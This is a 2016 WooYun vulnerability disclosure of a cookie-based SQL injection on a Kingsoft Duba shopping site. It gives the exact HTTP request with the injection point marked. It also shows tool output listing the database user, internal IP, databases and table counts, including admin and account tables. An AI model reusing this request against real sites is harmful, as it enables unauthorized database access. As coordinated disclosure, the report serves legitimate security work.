当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0196495

漏洞标题:金山毒霸某站存在cookie注入

相关厂商:金山毒霸

漏洞作者: Vinc

提交时间:2016-04-15 09:29

修复时间:2016-05-30 10:00

公开时间:2016-05-30 10:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-15: 厂商已经确认,细节仅向厂商公开
2016-04-25: 细节向核心白帽子及相关领域专家公开
2016-05-05: 细节向普通白帽子公开
2016-05-15: 细节向实习白帽子公开
2016-05-30: 细节向公众公开

简要描述:

- - !

详细说明:

Cookie参数warehouses存在SQL注入
GET /xianshimai/ HTTP/1.1
Cookie: PHPSESSID=7j5nm06c6r44uqavifa6hk3al6; warehouses=*;
X-Requested-With: XMLHttpRequest
Referer: http://gouwu.duba.com
Host: gouwu.duba.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

漏洞证明:

web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[08:18:43] [INFO] fetching current user
current user: 'gouwu_nav_sel@10.10.0.199'
available databases [3]:
[*] gouwu_nav
[*] information_schema
[*] test
Database: gouwu_nav
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| gouwu_site_items | 10422304 |
| gouwu_mobile_product | 1735034 |
| gouwu_maidian_items | 1304542 |
| gouwu_xianshimai_items | 201903 |
| gouwu_temai_brand_items | 182434 |
| gouwu_allbuy_items | 149596 |
| gouwu_app_publish_log | 114075 |
| gouwu_recommend_product | 113369 |
| gouwu_app_publish_log_day | 101946 |
| gouwu_zhidemai_items | 41462 |
| gouwu_ninenine_items | 33391 |
| gouwu_xianshigou_items | 31423 |
| gouwu_ninenine_blacklist | 23580 |
| gouwu_ninenine_tongji | 20406 |
| v9_log | 20131 |
| platform_account_base | 17700 |
| platform_account_info | 17700 |
| gouwu_site_s_logs | 17256 |
| gouwu_mobile_like | 15444 |
| gouwu_nineninebak_items | 11461 |
| gouwu_site_s_traderates | 9530 |
| gouwu_site_s_items | 6887 |
| gouwu_site_s_items_info | 6734 |
| gouwu_site_snoopy_item | 6603 |
| gouwu_ninenine_stat | 5022 |
| v9_linkage | 3284 |
| gouwu_site_temai_item | 2946 |
| gouwu_feed_back | 2684 |
| gouwu_search_keyword | 2000 |
| gouwu_xianshigou_brands | 1809 |
| gouwu_topic_goods | 1565 |
| gouwu_site_v5_stat | 1546 |
| gouwu_xianshimai_keyword | 1389 |
| gouwu_common_pictures | 1304 |
| gouwu_site_common_class | 1100 |
| gouwu_mobile_feedback | 1032 |
| gouwu_site_snoopy_shop | 929 |
| gouwu_xianshigou_search_keywords | 915 |
| gouwu_site_daquan | 902 |
| gouwu_site_s_stat | 858 |
| gouwu_site_batch_logs | 739 |
| gouwu_mingxing_pinterest | 391 |
| gouwu_common_link_items | 337 |
| gouwu_site_s_rule | 312 |
| v9_admin_role_priv | 309 |
| gouwu_site_business | 304 |
| v9_menu | 287 |
| gouwu_site_categorys | 270 |
| gouwu_site_tmall_temai_cat | 260 |
| gouwu_xianshigou_keywords | 207 |
| gouwu_site_s_sort | 198 |
| gouwu_recommend_sort | 192 |
| v9_attachment | 171 |
| gouwu_chaodian | 163 |
| gouwu_site_daquan_logowall | 159 |
| gouwu_site_t_master | 85 |
| gouwu_mingxing_news | 81 |
| gouwu_topic_items | 56 |
| gouwu_score_weight_config | 51 |
| gouwu_site_s_jizi | 44 |
| gouwu_app_update_log | 40 |
| gouwu_xianshigou_category | 40 |
| gouwu_mobile_slide | 37 |
| gouwu_app_publish_channel | 32 |
| gouwu_common_link_category | 32 |
| v9_cache | 26 |
| v9_module | 24 |
| gouwu_xianshimai_category | 18 |
| gouwu_home_category | 17 |
| gouwu_mingxing | 15 |
| gouwu_store_infoc | 14 |
| gouwu_chaodian_category | 12 |
| gouwu_topic_image | 12 |
| gouwu_topic_info | 12 |
| gouwu_xianshigou_filter_keywords | 11 |
| v9_admin | 10 |
| gouwu_xianshigou_weight | 9 |
| v9_urlrule | 9 |
| gouwu_app_list | 8 |
| v9_admin_role | 6 |
| gouwu_home_filter_keywords | 2 |
| platform_account_app | 1 |
| platform_account_project | 1 |
| v9_admin_panel | 1 |
| v9_site | 1 |
| v9_times | 1 |
+----------------------------------+---------+

修复方案:

.

版权声明:转载请注明来源 Vinc@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-04-15 09:52

厂商回复:

感谢提交,马上跟进处理

最新状态:

暂无


漏洞评价:

评价